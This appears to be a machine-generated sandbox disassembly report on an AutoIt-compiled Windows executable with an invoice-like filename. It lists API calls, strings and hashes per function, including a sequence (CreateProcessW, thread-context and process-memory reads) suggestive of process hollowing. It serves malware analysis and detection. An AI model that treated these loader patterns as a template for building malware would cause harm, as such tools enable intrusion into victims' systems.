                                                        Control-flow Graph

                                                        APIs
                                                        • _fseek.LIBCMT ref: 0045292B
                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                        • __fread_nolock.LIBCMT ref: 00452961
                                                        • __fread_nolock.LIBCMT ref: 00452971
                                                        • __fread_nolock.LIBCMT ref: 0045298A
                                                        • __fread_nolock.LIBCMT ref: 004529A5
                                                        • _fseek.LIBCMT ref: 004529BF
                                                        • _malloc.LIBCMT ref: 004529CA
                                                        • _malloc.LIBCMT ref: 004529D6
                                                        • __fread_nolock.LIBCMT ref: 004529E7
                                                        • _free.LIBCMT ref: 00452A17
                                                        • _free.LIBCMT ref: 00452A20
                                                        Similarity
                                                        • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                        • String ID:
                                                        • API String ID: 1255752989-0
                                                        • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                        • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                        • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                        • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                        • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                        • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                        • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                        • ImageList_ReplaceIcon.COMCTL32(00B4E470,000000FF,00000000), ref: 00410552
                                                        Similarity
                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                        • API String ID: 2914291525-1005189915
                                                        • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                        • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                        • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                        • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                        • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                        • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                        • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                        • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                        • RegisterClassExW.USER32(?), ref: 0041045D
                                                          • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                          • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                          • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                          • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                          • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                          • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                          • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00B4E470,000000FF,00000000), ref: 00410552
                                                        Similarity
                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                        • String ID: #$0$AutoIt v3
                                                        • API String ID: 423443420-4155596026
                                                        • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                        • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                        • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                        • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                        Similarity
                                                        • API ID: _malloc
                                                        • String ID: Default
                                                        • API String ID: 1579825452-753088835
                                                        • Opcode ID: ad9c003b1f2fa77121fbfcba884144bd1a02cdd9abf6dd606c80e641f461d2b6
                                                        • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                        • Opcode Fuzzy Hash: ad9c003b1f2fa77121fbfcba884144bd1a02cdd9abf6dd606c80e641f461d2b6
                                                        • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                                                        Control-flow Graph

                                                        Similarity
                                                        • API ID: __fread_nolock_fseek_memmove_strcat
                                                        • String ID: AU3!$EA06
                                                        • API String ID: 1268643489-2658333250
                                                        • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                        • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                        • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                        • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

                                                        Control-flow Graph

                                                        APIs
                                                        • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                        • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                        • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                        • CreatePopupMenu.USER32 ref: 00401204
                                                        Similarity
                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                        • String ID: TaskbarCreated
                                                        • API String ID: 129472671-2362178303
                                                        • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                        • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                        • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                        • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                                                        Control-flow Graph

                                                        APIs
                                                        • _malloc.LIBCMT ref: 004115F1
                                                          • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                          • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                          • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                        • std::exception::exception.LIBCMT ref: 00411626
                                                        • std::exception::exception.LIBCMT ref: 00411640
                                                        • __CxxThrowException@8.LIBCMT ref: 00411651
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                        • String ID: ,*H$4*H$@fI
                                                        • API String ID: 615853336-1459471987
                                                        • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                        • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                        • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                        • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2065 40b3ed0-40b3f7e call 40b18f0 2068 40b3f85-40b3fab call 40b4de0 CreateFileW 2065->2068 2071 40b3fad 2068->2071 2072 40b3fb2-40b3fc2 2068->2072 2073 40b40fd-40b4101 2071->2073 2079 40b3fc9-40b3fe3 VirtualAlloc 2072->2079 2080 40b3fc4 2072->2080 2074 40b4143-40b4146 2073->2074 2075 40b4103-40b4107 2073->2075 2081 40b4149-40b4150 2074->2081 2077 40b4109-40b410c 2075->2077 2078 40b4113-40b4117 2075->2078 2077->2078 2082 40b4119-40b4123 2078->2082 2083 40b4127-40b412b 2078->2083 2084 40b3fea-40b4001 ReadFile 2079->2084 2085 40b3fe5 2079->2085 2080->2073 2086 40b4152-40b415d 2081->2086 2087 40b41a5-40b41ba 2081->2087 2082->2083 2090 40b413b 2083->2090 2091 40b412d-40b4137 2083->2091 2092 40b4008-40b4048 VirtualAlloc 2084->2092 2093 40b4003 2084->2093 2085->2073 2094 40b415f 2086->2094 2095 40b4161-40b416d 2086->2095 2088 40b41ca-40b41d2 2087->2088 2089 40b41bc-40b41c7 VirtualFree 2087->2089 2089->2088 2090->2074 2091->2090 2098 40b404a 2092->2098 2099 40b404f-40b406a call 40b5030 2092->2099 2093->2073 2094->2087 2096 40b416f-40b417f 2095->2096 2097 40b4181-40b418d 2095->2097 2101 40b41a3 2096->2101 2102 40b419a-40b41a0 2097->2102 2103 40b418f-40b4198 2097->2103 2098->2073 2105 40b4075-40b407f 2099->2105 2101->2081 2102->2101 2103->2101 2106 40b40b2-40b40c6 call 40b4e40 2105->2106 2107 40b4081-40b40b0 call 40b5030 2105->2107 2113 40b40ca-40b40ce 2106->2113 2114 40b40c8 2106->2114 2107->2105 2115 40b40da-40b40de 2113->2115 2116 40b40d0-40b40d4 CloseHandle 2113->2116 2114->2073 2117 40b40ee-40b40f7 2115->2117 2118 40b40e0-40b40eb VirtualFree 2115->2118 2116->2115 2117->2068 2117->2073 2118->2117
                                                        APIs
                                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 040B3FA1
                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 040B41C7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1748191586.00000000040B1000.00000040.00000020.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_40b1000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CreateFileFreeVirtual
                                                        • String ID:
                                                        • API String ID: 204039940-0
                                                        • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                        • Instruction ID: 9faaf6ba035ae4c8574429a0ff1f913d0b74aeb5d52bf239770ba6591b82dee4
                                                        • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                        • Instruction Fuzzy Hash: 5DA14970E00219EBDB14CFA4C894BEEB7B5FF48304F208559E541BB281D775AA85CF99

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2119 4102b0-4102c5 SHGetMalloc 2120 4102cb-4102da SHGetDesktopFolder 2119->2120 2121 425dfd-425e0e call 433244 2119->2121 2122 4102e0-41031a call 412fba 2120->2122 2123 41036b-410379 2120->2123 2131 410360-410368 2122->2131 2132 41031c-410331 SHGetPathFromIDListW 2122->2132 2123->2121 2129 41037f-410384 2123->2129 2131->2123 2133 410351-41035d 2132->2133 2134 410333-41034a call 412fba 2132->2134 2133->2131 2134->2133
                                                        APIs
                                                        • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                        • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                        • _wcsncpy.LIBCMT ref: 004102ED
                                                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                        • _wcsncpy.LIBCMT ref: 00410340
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                        • String ID: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe
                                                        • API String ID: 3170942423-2398878773
                                                        • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                        • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                        • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                        • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2137 401250-40125c 2138 401262-401293 call 412f40 call 401b80 2137->2138 2139 4012e8-4012ed 2137->2139 2144 4012d1-4012e2 KillTimer SetTimer 2138->2144 2145 401295-4012b5 2138->2145 2144->2139 2146 4012bb-4012bf 2145->2146 2147 4272ec-4272f2 2145->2147 2150 4012c5-4012cb 2146->2150 2151 42733f-427346 2146->2151 2148 4272f4-427315 Shell_NotifyIconW 2147->2148 2149 42731a-42733a Shell_NotifyIconW 2147->2149 2148->2144 2149->2144 2150->2144 2154 427393-4273b4 Shell_NotifyIconW 2150->2154 2152 427348-427369 Shell_NotifyIconW 2151->2152 2153 42736e-42738e Shell_NotifyIconW 2151->2153 2152->2144 2153->2144 2154->2144
                                                        APIs
                                                          • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                          • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                          • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                        • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                        • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                        • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                        • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                        • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                        • String ID:
                                                        • API String ID: 3300667738-0
                                                        • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                        • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                        • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                        • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2155 40e4c0-40e4e5 call 403350 RegOpenKeyExW 2158 427190-4271ae RegQueryValueExW 2155->2158 2159 40e4eb-40e4f0 2155->2159 2160 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 2158->2160 2161 42721a-42722a RegCloseKey 2158->2161 2166 427210-427219 call 436508 2160->2166 2167 4271f7-42720e call 402160 2160->2167 2166->2161 2167->2166
                                                        APIs
                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                        • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: QueryValue$CloseOpen
                                                        • String ID: Include$Software\AutoIt v3\AutoIt
                                                        • API String ID: 1586453840-614718249
                                                        • Opcode ID: 89069ff54290d95ffeb0e4b83fb23c072447fe8f5d078393e68a3dec861a8096
                                                        • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                        • Opcode Fuzzy Hash: 89069ff54290d95ffeb0e4b83fb23c072447fe8f5d078393e68a3dec861a8096
                                                        • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                                        APIs
                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                        • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                        • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Window$CreateShow
                                                        • String ID: AutoIt v3$edit
                                                        • API String ID: 1584632944-3779509399
                                                        • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                        • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                        • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                        • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                        APIs
                                                          • Part of subcall function 040B3B90: Sleep.KERNELBASE(000001F4), ref: 040B3BA1
                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 040B3DBC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1748191586.00000000040B1000.00000040.00000020.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_40b1000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CreateFileSleep
                                                        • String ID: 9NN7ZWYN26GRCNZ5B
                                                        • API String ID: 2694422964-850227698
                                                        • Opcode ID: 96ec2a22317f3e270048a8ffc7e4e20a6526e4376fc6835b13d0e66c423434da
                                                        • Instruction ID: 9b1d671d05829c851a11e5f634ab085e4b56cec90e6062a723c9d8a94f775bb0
                                                        • Opcode Fuzzy Hash: 96ec2a22317f3e270048a8ffc7e4e20a6526e4376fc6835b13d0e66c423434da
                                                        • Instruction Fuzzy Hash: 52517F71E04248EBEF11DBA4CC55BEFBBB9AF04304F104599E648BB2C0D6B91B44CBA5
                                                        APIs
                                                        • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                        • _wcsncpy.LIBCMT ref: 00401C41
                                                        • _wcscpy.LIBCMT ref: 00401C5D
                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                        • String ID: Line:
                                                        • API String ID: 1874344091-1585850449
                                                        • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                        • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                        • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                        • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                        APIs
                                                        • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                        • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                        • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                        • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Close$OpenQueryValue
                                                        • String ID: Control Panel\Mouse
                                                        • API String ID: 1607946009-824357125
                                                        • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                        • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                        • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                        • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                        APIs
                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 040B334B
                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 040B33E1
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 040B3403
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1748191586.00000000040B1000.00000040.00000020.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_40b1000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                        • String ID:
                                                        • API String ID: 2438371351-0
                                                        • Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                        • Instruction ID: e84fc5bd37a86dea95da6b861c30b4e4e2dafaecab9edd0715d047d8902dc868
                                                        • Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
